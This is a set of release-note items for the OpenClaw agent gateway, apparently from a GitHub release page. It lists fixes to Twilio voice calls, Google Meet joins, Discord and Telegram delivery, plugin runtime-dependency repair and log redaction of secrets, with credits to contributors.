<li>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</li>
<li>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</li>
<li>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</li>
<li>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</li>
<li>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</li>
<li>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</li>
<li>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</li>
<li>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</li>
<li>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</li>
<li>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</li>
<li>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</li>
<li>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</li>
<li>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</li>
<li>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</li>
<li>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</li>
<li>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</li>
<li>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</li>
<li>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</li>
<li>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</li>
<li>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</li>
<li>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</li>
<li>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</li>
<li>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</li>
<li>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</li>
<li>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</li>
<li>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</li>
<li>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</li>
<li>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</li>
<li>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</li>
<li>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</li>
<li>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</li>
<li>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</li>
